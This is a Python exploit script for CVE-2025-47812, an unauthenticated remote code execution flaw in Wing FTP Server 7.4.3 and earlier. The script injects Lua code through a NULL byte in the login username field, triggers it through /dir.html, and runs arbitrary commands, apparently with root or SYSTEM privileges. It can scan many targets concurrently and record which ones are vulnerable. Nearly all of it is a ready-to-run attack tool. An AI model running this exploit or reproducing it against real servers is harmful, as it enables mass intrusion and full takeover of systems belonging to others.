#!/usr/bin/env python3 # Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE) # CVE: CVE-2025-47812 # Date: 2025-06-30 # Original Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r) # Modified by: d3vn0mi (https://github.com/d3vn0mi) # Vendor Homepage: https://www.wftpserver.com/ # Version: Wing FTP Server <= 7.4.3 # Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges) # Description: # Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated # remote code execution (RCE) flaw (CVE-2025-47812). This vulnerability arises from # improper handling of NULL bytes in the 'username' parameter during login, leading # to Lua code injection into session files. These maliciously crafted session files # are subsequently executed when authenticated functionalities (e.g., /dir.html) are # accessed, resulting in arbitrary command execution on the server with elevated # privileges (root on Linux, SYSTEM on Windows). import argparse import logging import re import sys import time from concurrent.futures import ThreadPoolExecutor, as_completed from urllib.parse import quote, urlparse import requests import urllib3 # Suppress only the InsecureRequestWarning from urllib3 when --no-verify is used urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) BANNER = r""" ____ _______ ___ __ ____ __ ___ ____ / __ \|__ / | / / | / / __ \/ |/ // _/ / / / / /_ <| | / /| |/ / / / / /|_/ / / / / /_/ /___/ /| |/ / | / /_/ / / / /_/ / /_____/____/ |___/ |_/ \____/_/ /_/____/ CVE-2025-47812 | Wing FTP Server <= 7.4.3 Unauthenticated Remote Code Execution Original Author: 4m3rr0r | Modified: d3vn0mi """ # Default command used when no custom command is provided (safe check) DEFAULT_CHECK_CMD = "echo CVE-2025-47812-VULN" VULN_MARKER = "CVE-2025-47812-VULN" # Configure module-level logger logger = logging.getLogger("cve-2025-47812") def setup_logging(verbose: bool = False, log_file: str | None = None) -> None: """Configure logging with console and optional file output.""" level = logging.DEBUG if verbose else logging.INFO logger.setLevel(level) formatter = logging.Formatter( "%(asctime)s [%(levelname)s] %(message)s", datefmt="%Y-%m-%d %H:%M:%S", ) # Console handler with color support console = logging.StreamHandler(sys.stderr) console.setLevel(level) console.setFormatter(_ColorFormatter(formatter)) logger.addHandler(console) # Optional file handler (no colors) if log_file: fh = logging.FileHandler(log_file, encoding="utf-8") fh.setLevel(logging.DEBUG) fh.setFormatter(formatter) logger.addHandler(fh) logger.info("Logging to file: %s", log_file) class _ColorFormatter(logging.Formatter): """Wrap an existing formatter to inject ANSI colors per level.""" COLORS = { logging.DEBUG: "\033[90m", # gray logging.INFO: "\033[92m", # green logging.WARNING: "\033[93m", # yellow logging.ERROR: "\033[91m", # red logging.CRITICAL: "\033[95m", # magenta } RESET = "\033[0m" def __init__(self, base_formatter: logging.Formatter): super().__init__() self._base = base_formatter def format(self, record: logging.LogRecord) -> str: msg = self._base.format(record) color = self.COLORS.get(record.levelno, "") return f"{color}{msg}{self.RESET}" def validate_url(url: str) -> str: """Normalise and validate a target URL.""" url = url.rstrip("/") parsed = urlparse(url) if parsed.scheme not in ("http", "https"): raise ValueError(f"Unsupported URL scheme: {parsed.scheme!r}") if not parsed.hostname: raise ValueError(f"Missing hostname in URL: {url!r}") return url def build_payload(username: str, password: str, command: str) -> str: """Construct the injection payload for the login POST body.""" encoded_username = quote(username) encoded_password = quote(password) # The NULL byte terminates the C string in c_CheckUser(), but the full # username (including Lua code) is written into the session file. lua_injection = ( "%00]]%0d" f"local+h+%3d+io.popen(\"{command}\")%0d" "local+r+%3d+h%3aread(\"*a\")%0d" "h%3aclose()%0d" "print(r)%0d" "--" ) return f"username={encoded_username}{lua_injection}&password={encoded_password}" def run_exploit( target_url: str, command: str, username: str = "anonymous", password: str = "", timeout: int = 15, verify_ssl: bool = True, retries: int = 2, ) -> tuple[bool, str]: """ Execute the CVE-2025-47812 exploit against a single target. Returns a tuple of (is_vulnerable: bool, output: str). """ target_url = validate_url(target_url) host = urlparse(target_url).netloc common_headers = { "Host": host, "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive", "Upgrade-Insecure-Requests": "1", } login_url = f"{target_url}/loginok.html" payload = build_payload(username, password, command) login_headers = { **common_headers, "Content-Type": "application/x-www-form-urlencoded", "Origin": target_url, "Referer": f"{target_url}/login.html?lang=english", "Cookie": "client_lang=english", } # --- Stage 1: POST to inject Lua via session file --- logger.debug("Stage 1 -> POST %s (user=%s, cmd=%s)", login_url, username, command) login_response = _request_with_retry( "POST", login_url, headers=login_headers, data=payload, timeout=timeout, verify=verify_ssl, retries=retries, ) if login_response is None: return False, "" set_cookie = login_response.headers.get("Set-Cookie", "") match = re.search(r"UID=([^;]+)", set_cookie) if not match: logger.error("UID not found in Set-Cookie for %s — exploit may have failed", target_url) return False, "" uid = match.group(1) logger.debug("Extracted UID: %s", uid) # --- Stage 2: GET /dir.html to trigger Lua execution --- dir_url = f"{target_url}/dir.html" dir_headers = { **common_headers, "Cookie": f"UID={uid}", } logger.debug("Stage 2 -> GET %s (UID=%s)", dir_url, uid) dir_response = _request_with_retry( "GET", dir_url, headers=dir_headers, timeout=timeout, verify=verify_ssl, retries=retries, ) if dir_response is None: return False, "" # Extract command output (appears before XML response body) body = dir_response.text clean_output = re.split(r"<\?xml", body)[0].strip() is_vuln = bool(clean_output) if is_vuln: logger.info("VULNERABLE: %s", target_url) else: logger.warning("Not vulnerable: %s", target_url) return is_vuln, clean_output def _request_with_retry( method: str, url: str, retries: int = 2, **kwargs, ) -> requests.Response | None: """Send an HTTP request with retry + exponential backoff on failure.""" last_err = None for attempt in range(1, retries + 2): # retries + 1 total attempts try: resp = requests.request(method, url, **kwargs) resp.raise_for_status() return resp except requests.exceptions.RequestException as exc: last_err = exc if attempt <= retries: wait = 2 ** attempt logger.warning( "Request to %s failed (attempt %d/%d): %s — retrying in %ds", url, attempt, retries + 1, exc, wait, ) time.sleep(wait) else: logger.error("Request to %s failed after %d attempts: %s", url, attempt, exc) return None def load_targets(url: str | None, filepath: str | None) -> list[str]: """Return a deduplicated list of target URLs from CLI args.""" targets: list[str] = [] if filepath: try: with open(filepath, "r") as fh: for line in fh: stripped = line.strip() if stripped and not stripped.startswith("#"): targets.append(stripped) except OSError as exc: logger.error("Could not read target file %r: %s", filepath, exc) sys.exit(1) if url: targets.append(url) # Deduplicate while preserving order seen: set[str] = set() unique: list[str] = [] for t in targets: normed = t.rstrip("/") if normed not in seen: seen.add(normed) unique.append(normed) return unique def main() -> None: parser = argparse.ArgumentParser( description="CVE-2025-47812 — Wing FTP Server <= 7.4.3 Unauthenticated RCE", formatter_class=argparse.RawDescriptionHelpFormatter, epilog="Examples:\n" " %(prog)s -u http://192.168.1.10\n" " %(prog)s -u http://192.168.1.10 -c 'id'\n" " %(prog)s -f targets.txt -o vuln.txt -t 8\n", ) target_group = parser.add_argument_group("target") target_group.add_argument( "-u", "--url", type=str, help="Single target URL (e.g. http://192.168.134.130)", ) target_group.add_argument( "-f", "--file", type=str, help="File containing target URLs (one per line, # comments allowed)", ) exploit_group = parser.add_argument_group("exploit options") exploit_group.add_argument( "-c", "--command", type=str, help="Command to execute on the remote server (enables verbose output)", ) exploit_group.add_argument( "-U", "--username", type=str, default="anonymous", help="Username for the exploit payload (default: anonymous)", ) exploit_group.add_argument( "-P", "--password", type=str, default="", help="Password for the exploit payload (default: empty)", ) output_group = parser.add_argument_group("output") output_group.add_argument( "-v", "--verbose", action="store_true", help="Enable verbose / debug logging", ) output_group.add_argument( "-o", "--output", type=str, help="Save vulnerable URLs to this file", ) output_group.add_argument( "-l", "--log-file", type=str, help="Write detailed log to this file", ) net_group = parser.add_argument_group("network") net_group.add_argument( "-t", "--threads", type=int, default=1, help="Number of concurrent threads for multi-target scans (default: 1)", ) net_group.add_argument( "--timeout", type=int, default=15, help="HTTP request timeout in seconds (default: 15)", ) net_group.add_argument( "--retries", type=int, default=2, help="Number of retries on connection failure (default: 2)", ) net_group.add_argument( "--no-verify", action="store_true", help="Disable SSL certificate verification", ) args = parser.parse_args() if not args.url and not args.file: parser.error("Either -u/--url or -f/--file must be specified.") # When a custom command is provided, force verbose so the user sees output verbose = args.verbose or bool(args.command) setup_logging(verbose=verbose, log_file=args.log_file) print(BANNER) command = args.command if args.command else DEFAULT_CHECK_CMD targets = load_targets(args.url, args.file) if not targets: logger.error("No valid targets provided.") sys.exit(1) logger.info("Loaded %d target(s) — threads=%d, timeout=%ds, retries=%d", len(targets), args.threads, args.timeout, args.retries) vulnerable: list[str] = [] verify_ssl = not args.no_verify def _attack(target: str) -> tuple[str, bool, str]: is_vuln, output = run_exploit( target, command, username=args.username, password=args.password, timeout=args.timeout, verify_ssl=verify_ssl, retries=args.retries, ) return target, is_vuln, output with ThreadPoolExecutor(max_workers=args.threads) as pool: futures = {pool.submit(_attack, t): t for t in targets} for future in as_completed(futures): target = futures[future] try: target, is_vuln, output = future.result() except Exception: logger.exception("Unhandled error processing %s", target) continue if is_vuln: vulnerable.append(target) if args.command: print(f"\n--- Output from {target} ---") print(output) print("----------------------------\n") # Summary print() logger.info("Scan complete: %d/%d targets vulnerable", len(vulnerable), len(targets)) if args.output and vulnerable: try: with open(args.output, "w") as out_file: for site in vulnerable: out_file.write(site + "\n") logger.info("Vulnerable URLs saved to: %s", args.output) except OSError as exc: logger.error("Could not write to output file %r: %s", args.output, exc) if __name__ == "__main__": main()